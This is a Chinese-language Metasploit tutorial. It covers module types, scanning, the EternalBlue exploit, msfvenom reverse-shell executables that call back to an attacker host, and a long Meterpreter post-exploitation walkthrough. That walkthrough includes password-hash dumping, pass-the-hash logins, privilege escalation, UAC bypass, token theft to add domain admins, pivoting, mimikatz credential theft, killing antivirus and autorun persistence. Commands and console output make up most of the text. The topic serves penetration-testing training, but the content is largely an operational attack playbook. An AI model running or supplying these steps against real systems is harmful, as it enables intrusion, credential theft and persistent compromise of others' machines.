Metasploit 是一款比较好用的渗透工具。

简介

基本框架


MSF默认存放模块的目录如下

1
/usr/share/metasploit-framework/modules/

模块:

  • auxiliary:负责执行信息收集、扫描、嗅探、指纹识别、口令猜测和Dos攻击等功能的辅助模块

  • exploits:利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法(主动、被动)

  • payloads:成功exploit之后,真正在目标系统执行的代码或指令。分为3种类型的payload,分别是single、stages和stagers。shellcode是特殊的payload,用于拿shell。

    • single:all-in-one。完整的payload,这些payload都是一体化的,不需要依赖外部的库和包。
    • stagers:目标计算机内存有限时,先传输一个较小的payload用于建立连接
    • stages:利用stagers建立的连接下载后续payload
  • encoders:对payload进行加密,躲避AntiVirus检查的模块

  • nops:提高payload稳定性及维持大小。在渗透攻击构造恶意数据缓冲区时,常常要在真正要执行的Shellcode之前添加一段空指令区, 这样当触发渗透攻击后跳转执行ShellCode时,有一个较大的安全着陆区,从而避免受到内存 地址随机化、返回地址计算偏差等原因造成的ShellCode执行失败,提高渗透攻击的可靠性。

  • post:后期渗透模块。在取得目标系统远程控制权后,进行一系列的后渗透攻击动作,如获取敏感信息、跳板攻击等操作

  • evasion: 自带windows denfender的混淆,免杀效果弱

基础库:

  • Ruby扩展(REX):处理几乎所有的核心功能,如设置网络套接字、网络的连接、格式化和所有其他基本功能。
  • MSF核心:提供了基本的应用编程接口和框架的实际核心。
  • MSF基础:对模块提供了友好的应用编程接口

msfconsole

1
2
3
4
5
6
7
8
9
10
11
12
13
use[Auxiliary/Exploit/Payload/Encoder]    选择一个指定的模块并使其开始工作
show [auxiliary/exploit/payload/encoder/options] 显示可用的特定功能的模块
set [options/payload] 给某个特定的对象赋值
setg [options/payload] 给某个特定的对象赋值的同时设定作用域为全局,在模块进行切换的时候,该对象的值不会改变
run 在设定一个辅助模块需要的所有选项之后,启动该模块
exploit 启动一个渗透攻击模块
back 取消当前选择的模块并且退回到上一级命令窗口
info 列出模块的相关信息
search 搜索符合条件的特定模块
check 检查摸个特定目标是否易受到攻击
sessions 列出当前可用会话,sessions -i id 可以进入一个session交互
load/unload:调用外部的扫描命令
route:添加一条路由。比如发往某个子网的流量都通过攻陷的机器发送

扫描

tcp空闲扫描
window上运行metasploit,线程数最好不要超过16,UXNIX平台上不要超过128

1
2
3
4
5
6
7
msf > use auxiliary/scanner/ip/ipidseq 
msf auxiliary(ipidseq) > show options
msf auxiliary(ipidseq) > set rhosts 192.168.2.0/24
rhosts => 192.168.2.0/24
msf auxiliary(ipidseq) > set threads 60
threads => 60
msf auxiliary(ipidseq) > run

服务扫描

针对性扫描
1)服务器消息块协议扫描

1
msf > use auxiliary/scanner/smb/smb_version

2)搜寻配置不当的mssql

1
2
3
4
5
6
msf > use auxiliary/scanner/mssql/mssql_ping  
msf auxiliary(mssql_ping) > set rhosts 192.168.2.0/24
rhosts => 192.168.2.0/24
msf auxiliary(mssql_ping) > set threads 255
threads => 255
msf auxiliary(mssql_ping) > run

3)ssh服务器扫描

1
msf>search ssh_version

4)FTP扫描

1
2
3
4
5
6
msf > use auxiliary/scanner/ftp/ftp_version   
msf auxiliary(ftp_version) > set threads 255
threads => 255
msf auxiliary(ftp_version) > set rhosts 192.168.2.0/24
rhosts => 192.168.2.0/24
msf auxiliary(ftp_version) > run

5)简单的网络管理

1
search snmp_login

漏洞扫描

ms17_010漏洞扫描

1
2
3
4
5
use auxiliary/scanner/smb/smb_ms17_010 # 调用漏洞扫描模块
show option # 查看模块配置选项
set RHOST 192.168.1.1-254 # 配置扫描目标
set THREADS 30 #配置扫描线程
run #运行脚本

扫描开放的vnc空口令
最新版的vnc服务器不再允许使用空口令

1
msf > use  auxiliary/scanner/vnc/vnc_none_auth

漏洞利用

永恒之蓝

1
2
3
4
5
6
7
8
9
10
msf> use exploit/windows/smb/ms17_010_eternalblue # 调用ms17-010永恒之蓝漏洞攻击模块
msf exploit(windows/smb/ms17_010_eternalblue) > show targets #查看攻击的有效对象
msf exploit(windows/smb/ms17_010_eternalblue) > info #查看详细信息
msf exploit(ms17_010_eternalblue) > setg rhost 192.168.2.5 # 设定全局变量的攻击目标 192.168.2.5
rhost => 192.168.2.5
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp # 调用反弹的攻击载荷
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > set lhost 192.168.2.3 # 设定将meterpreter反弹给192.168.2.3
lhost => 192.168.2.3
msf exploit(ms17_010_eternalblue) > show options # 查询攻击参数设置

msfdb

用来管理MSF的数据库的命令

1
2
3
4
5
6
7
msfdb init     # start and initialize the database
msfdb reinit # delete and reinitialize the database
msfdb delete # delete database and stop using it
msfdb start # start the database
msfdb stop # stop the database
msfdb status # check service status
msfdb run # start the database and run msfconsole

msfvenom

基本命令

1
2
3
msfvenom -h  
msfvenom -l payloads 查看一下payload
msfvenom -l encoders 查看编码

window:

1
2
3
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -a x86 --platform Windows -f exe > shell.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.100.13 LPORT=3333 -f exe > shell.exe

linux:

1
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -a x86 --platform Linux -f elf > shell.elf

meterpreter

基本命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
background  # 让meterpreter处于后台模式  
sessions -i index # 与会话进行交互,index表示第一个session
quit # 退出会话
shell # 获得控制台权限
irb # 开启ruby终端
ps # 查看当前活跃进程
migrate pid # 将Meterpreter会话移植到进程数位pid的进程中
kill pid # 杀死进程
getpid # 获取当前进程的pid
sysinfo # 查看目标机系统信息,如机器名,操作系统等
shutdown # 关机
screenshot 截屏
sysinfo 系统运行的平台信息
getuid 查看权限
getwd 获取目标机器的工作目录
getlwd 得到当前系统的工作目录
run post/windows/gather/checkvm 确定是不是虚拟机

操作文件

上传文件到目标主机和下载目标文件

1
2
3
4
5
6
7
8
meterpreter > upload /root/1.txt c:\\
[*] uploading : /root/1.txt -> c:\
[*] uploaded : /root/1.txt -> c:\\1.txt

meterpreter > download c:/2.txt /root
[*] Downloading: c:/2.txt -> /root/2.txt
[*] Downloaded 5.00 B of 5.00 B (100.0%): c:/2.txt -> /root/2.txt
[*] download : c:/2.txt -> /root/2.txt

搜索目标主机上的文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
meterpreter > search -h 
Usage: search [-d dir] [-r recurse] -f pattern [-f pattern]...
Search for files.

OPTIONS:

-d <opt> The directory/drive to begin searching from. Leave empty to search all drives. (Default: )
-f <opt> A file pattern glob to search for. (e.g. *secret*.doc?)
-h Help Banner.
-r <opt> Recursivly search sub directories. (Default: true)

meterpreter > search -d c:\\ -r flase -f *.txt
Found 2 results...
c:\1.txt (2 bytes)
c:\2.txt (5 bytes)

3389

开3389

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
meterpreter > run post/windows/manage/enable_rdp

[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20180430181213_default_192.168.1.187_host.windows.cle_516653.txt
meterpreter > netstat -ano

Connection list
===============

Proto Local address Remote address State User Inode PID/Program name
----- ------------- -------------- ----- ---- ----- ----------------
tcp 0.0.0.0:135 0.0.0.0:* LISTEN 0 0 696/svchost.exe
tcp 0.0.0.0:445 0.0.0.0:* LISTEN 0 0 4/System
tcp 0.0.0.0:3389 0.0.0.0:* LISTEN 0 0 1040/svchost.exe

远程主机的3389的端口映射到本机的1235号端口

1
2
meterpreter > portfwd add -l 1234 -r 192.168.1.187 -p 3389
[*] Local TCP relay created: :1234 <-> 192.168.1.187:3389

密码哈希值

获取密码哈希值
aad3b435开头的哈希值是一个空的或者不存在的哈希值–空字符串的占位符

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
meterpreter > use priv
[-] The 'priv' extension has already been loaded.
meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 24a05299b237d9f48c9eff1c6a88a57e...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:db3dd3018cff8541ab7168f899737020:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

用得到的管理员的用户哈希值登录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
msf > use exploit/windows/smb/psexec
msf exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as


Exploit target:

Id Name
-- ----
0 Automatic


msf exploit(windows/smb/psexec) > set rhost 192.168.1.187
rhost => 192.168.1.187
msf exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/psexec) > set lhost 192.168.1.130
lhost => 192.168.1.130
msf exploit(windows/smb/psexec) > set lpost 4333
lpost => 4333
msf exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:db3dd3018cff8541ab7168f899737020
SMBPass => aad3b435b51404eeaad3b435b51404ee:db3dd3018cff8541ab7168f899737020
msf exploit(windows/smb/psexec) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(windows/smb/psexec) > exploit
[*] Started reverse TCP handler on 192.168.1.230:1444
[*] 192.168.1.187:445 - Connecting to the server...
[*] 192.168.1.187:445 - Authenticating to 192.168.1.187:445 as user 'Administrator'...
[*] 192.168.1.187:445 - Selecting PowerShell target
[*] 192.168.1.187:445 - Executing the payload...
[+] 192.168.1.187:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (205891 bytes) to 192.168.1.187
[*] Meterpreter session 1 opened (192.168.1.230:1444 -> 192.168.1.187:49468) at 2018-04-30 18:48:56 -0400

meterpreter >

权限提升

1
2
3
4
5
6
meterpreter > use priv
[-] The 'priv' extension has already been loaded.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

bypassuac

1
2
3
4
5
6
meterpreter > background
[*] Backgrounding session 1...
msf exploit(windows/smb/psexec) > use exploit/windows/local/bypassuac
msf exploit(windows/local/bypassuac) > set session 1
session => 1
msf exploit(windows/local/bypassuac) > exploit

令牌的假冒

1)incognito

1
2
3
4
5
6
7
8
9
10
11
12
13
14
meterpreter > use incognito 
Loading extension incognito...Success.
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
WIN-VONVJ6OMEQ7\Administrator

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

2)ps 找到域管理员的pid参数(有时候不能看到)

1
2
meterpreter>ps 
meterpreter > steal_token pid号 #盗取域管理员用户的令牌

利用域管理员的令牌创建用户,并授予域管理员的权限
例子

1
2
3
meterpreter>impresonate_token SNEAKS.IN\\domianadmin
meterpreter>add_user qy qy -h 192.168.1.5 #-h是域管理员添加账号的地址
meterpreter>add_group_user "Doamin Admins" qy -h 192.168.1.5

通过跳板攻击其他主机

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
meterpreter > run get_local_subnets #查看本地子网

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 192.168.1.0/255.255.255.0

meterpreter > background
[*] Backgrounding session 1...

msf exploit(windows/local/bypassuac) > route add 192.168.2.0 255.255.255.0 1 #告诉系统将远程ID通过攻击会话1来进行路由
[*] Route added
msf exploit(windows/local/bypassuac) > route print #显示当前活跃的路由信息

IPv4 Active Routing Table
=========================

Subnet Netmask Gateway
------ ------- -------
192.168.2.0 255.255.255.0 Session 1

获取账户密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
meterpreter > load mimikatz
Loading extension mimikatz...Success.
meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

AuthID Package Domain User Password
------ ------- ------ ---- --------
0;996 Negotiate WORKGROUP WIN-VONVJ6OMEQ7$
0;46406 NTLM
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;999 NTLM WORKGROUP WIN-VONVJ6OMEQ7$

脚本的使用

1).vnc

1
2
3
4
5
6
7
8
9
10
11
meterpreter > run vnc #在远程系统上安装vnc会话
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.230 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\Windows\TEMP\jzoEGmzImp.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.230:4545...

meterpreter > run screen_unlock # 对目标机器上的桌面进行解锁
[!] Meterpreter scripts are deprecated. Try post/windows/escalate/screen_unlock.
[!] Example: run post/windows/escalate/screen_unlock OPTION=value [...]
[*] no working target found

2).查看系统安装的软件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
meterpreter > run post/windows/gather/enum_applications

[*] Enumerating applications installed on WIN-VONVJ6OMEQ7

Installed Applications
======================

Name Version
---- -------
2345好压 v5.9
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 9.0.30729.6161
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 14.0.24215.1
Microsoft Visual C++ 2015 x64 Additional Runtime - 14.0.24215 14.0.24215
Microsoft Visual C++ 2015 x64 Minimum Runtime - 14.0.24215 14.0.24215
Python 2.7.13 (64-bit) 2.7.13150
VMware Tools 10.2.0.7259539


[+] Results stored in: /root/.msf4/loot/20180501054603_default_192.168.1.187_host.application_930049.txt

3)迁移到稳定的进程

1
2
3
4
5
6
7
8
9
10
11
12
meterpreter > getpid
Current pid: 1128

meterpreter > run post/windows/manage/migrate
[*] Running module against WIN-VONVJ6OMEQ7
[*] Current server process: spoolsv.exe (1128)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3592
[+] Successfully migrated to process 3592

meterpreter > getpid
Current pid: 3592

4)关闭杀毒软件

1
2
3
4
5
meterpreter > run killav

[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[*] Killing Antivirus services on the target...

5)查看目标机上的所有来流量

1
2
3
4
5
6
7
meterpreter > run packetrecorder -i 1
[!] Meterpreter scripts are deprecated. Try post/windows/manage/rpcapd_start.
[!] Example: run post/windows/manage/rpcapd_start OPTION=value [...]
[*] Starting Packet capture on interface 1
[+] Packet capture started
[*] Packets being saved in to /root/.msf4/logs/scripts/packetrecorder/WIN-VONVJ6OMEQ7_20180501.0138/WIN-VONVJ6OMEQ7_20180501.0138.cap
[*] Packet capture interval is 30 Seconds

6)得到目标主机系统用户的哈希值

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
meterpreter > run hashdump

[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 24a05299b237d9f48c9eff1c6a88a57e...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:db3dd3018cff8541ab7168f899737020:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

7)得到详细的系统信息
用户名和密码、下载全部注册表、挖掘密码哈希值和收集系统信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
meterpreter > run scraper
[*] New session on 192.168.1.187:445...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\Windows\TEMP\JKaHEoEs.reg)
[*] Cleaning HKCU
[*] Exporting HKLM
[*] Downloading HKLM (C:\Windows\TEMP\qCMsnidu.reg)
[*] Cleaning HKLM
[*] Exporting HKCC
[*] Downloading HKCC (C:\Windows\TEMP\PTbboPFX.reg)
[*] Cleaning HKCC
[*] Exporting HKCR
[*] Downloading HKCR (C:\Windows\TEMP\AQMWnvZo.reg)
[*] Cleaning HKCR
[*] Exporting HKU
[*] Downloading HKU (C:\Windows\TEMP\XNLnHUgE.reg)
[*] Cleaning HKU
[*] Completed processing on 192.168.1.187:445...

8)控制持久化
-X 开机自启动,-i 40每40秒重连一次 -p指定端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
meterpreter > run persistence -X -i 40 -p 443 -r 192.168.1.187 

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-VONVJ6OMEQ7_20180501.2631/WIN-VONVJ6OMEQ7_20180501.2631.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.187 LPORT=443
[*] Persistent agent script is 99671 bytes long
[+] Persistent Script written to C:\Windows\TEMP\ManzZNr.vbs
[*] Executing script C:\Windows\TEMP\ManzZNr.vbs
[+] Agent executed with PID 3852
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\KHNDPfTiTa
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\KHNDPfTiTa
开始连接

msf > use multi/handler
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.187
lhost => 192.168.1.187
msf exploit(multi/handler) > set lport 443
lport => 443
msf exploit(multi/handler) > exploit

8)列出所有后渗透模块

1
2
3
4
run post/ 后,按tab见

meterpreter > run post/
Display all 207 possibilities? (y or n)

参考文章:
MSF——基本使用和Exploit模块(一)